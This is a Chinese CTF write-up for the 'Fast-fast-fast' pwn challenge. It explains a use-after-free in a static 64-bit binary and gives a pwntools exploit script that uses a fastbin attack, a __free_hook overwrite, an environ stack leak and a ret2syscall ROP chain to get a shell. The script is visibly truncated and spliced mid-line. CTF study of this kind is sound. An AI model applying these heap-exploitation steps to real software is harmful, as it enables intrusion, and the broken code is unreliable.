“百度杯”CTF比赛 2017 二月场-Fast-fast-fast

Xor0ne

Fast-fast-fast

本题来自于：i春秋

题目内容：
nc 106.75.2.53 10003

历经千难，华夜终于到达诸神之战的战场，在这里他要分别挑战三位上古大神，只有打败他们才能平息北荒的这场战事。
第一位上古大神是 ：IRONMANS
这位上古平生最爱读一本叫做《pwn选手的前世今生之pwn神崛起》

tips：该题只有一个红包，只有第一位解答该题的同学才能获得赛后我们的工作人员会私信亲的，加油！


附件下载：

Writeup

来源于：https://www.ichunqiu.com/writeup/detail/533

1. ➜  workspace file fast-fast-fast
   
2. fast-fast-fast: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=fe41ec825a7cb7c06a0cf30d8fcc1419f7ca6ccd, not stripped
   
3. ➜  workspace checksec fast-fast-fast
   
4. [*] '/mnt/hgfs/Binary/CTF/Shooting/ichun/Pwn/fast-fast-fast/workspace/fast-fast-fast'
   
5.     Arch:     amd64-64-little
   
6.     RELRO:    Partial RELRO
   
7.     Stack:    No canary found
   
8.     NX:       NX enabled
   
9.     PIE:      No PIE (0x400000)

复制代码

题目是一个静态编译的64bit binary，看题目的名称猜测可能要用fastbin attack...

首先题目建立了smallbin与fastbin两个bins，分别都有create，delete，edit三种操作，其中漏洞出现在delete函数，无论是smallbin还是fastbin共同使用该delete函数

1. _QWORD *__fastcall delet(_QWORD *a1)
   
2. {
   
3.   _QWORD *result; // rax
   
4.   free(a1[2]);
   
5.   result = a1;
   
6.   *a1 = 0LL;
   
7.   return result;
   
8. }

复制代码

首先delete没有判定是否已经delete，也没有在free将pointer置NULL，造成UAF(use after free)

基本思路利用UAF 做Fastbin Attack

1. 通过构造一个fastbin与smallbin 指向用一块heap 内存，从而edit small修改已经被free掉的fastbin 的内容，再次cretea fastbin时触发fastbin attack

2. 通过fastbinattack 将malloc的分配控制在.bss段的smallbin指针区域，通过该fastbin的修改能够控制smallbin的read与write

3. 泄露environ确定stack的栈顶地址

4. 利用smallbin，向ret返回地址处写入我们ret2syscall的Ropgadgets，Getshell

#/usr/env/bin python

#-*- coding: utf-8 -*-

from pwn import *

from struct import *

import sys

def creat_little(serect):

    io.sendlineafter('3 : saysecret\n',str(1))

    sleep(0.1)

    io.sendlineafter('3 : delet\n',str(1))

    sleep(0.1)

    io.sendafter('please input your secret\n',serect)

    sleep(0.1)

def edit_little(serect):

    io.sendlineafter('3 : saysecret\n',str(1))

    sleep(0.1)

    io.sendlineafter('3 : delet\n',str(2))

    sleep(0.1)

    io.sendafter('please input your secrert\n',serect)

    sleep(0.1)

def delet_little():

    io.sendlineafter('3 : saysecret\n',str(1))

    sleep(0.1)

    io.sendlineafter('3 : delet\n',str(3))

    sleep(0.1)

def creat_small(serect):

    io.sendlineafter('3 : saysecret\n',str(2))

    sleep(0.1)

    io.sendlineafter('3 : delet\n',str(1))

    sleep(0.1)

    io.sendafter('please input your secret\n',serect)

    sleep(0.1)

def edit_small(serect):

    io.sendlineafter('3 : saysecret\n',str(2))

    sleep(0.1)

    io.sendlineafter('3 : delet\n',str(2))

    sleep(0.1)

    io.sendafter('please input your secrert\n',serect)

    sleep(0.1)

def delet_small():

    io.sendlineafter('3 : saysecret\n',str(2))

    sleep(0.1)

    io.sendlineafter('3 : delet\n',str(3))

    sleep(0.1)

def saysecret():

    io.sendlineafter('3 : saysecret\n',str(3))

    sleep(0.1)

def read_it(read_addr):

    edit_little(p64(1)+p64(0xfb0)+read_addr)

    delet_small()

def write_it(write_addr,write_content):

    edit_little(p64(1)+p64(0xfb0)+write_addr)

    edit_small(write_content)

def exploit():

    #fastbin attack

    creat_little('A'*80)

    delet_little()

    creat_small('B'*84)

    delet_little()

    creat_little('C'*80)

    delet_little()

    edit_small(p64(0x6C4AA0))

    saysecret()

    creat_little(p64(0x6C4A80))

    #_free_hook ==> puts

    write_it(p64(0x6C3750),p64(0x408CF0))

    #leak stack_addr use *environ

    read_it(p64(0x6C3888))

    stack_addr = u64(io.recvuntil('\n',drop=True).ljust(0x8,'\x00'))

    log.info('stack_addr:'+hex(stack_addr))

    p = ''

    p += pack('1:

        io = remote(sys.argv[1],sys.argv[2])

        exploit()

    else:

        io = process('./fast-fast-fast')

        exploit()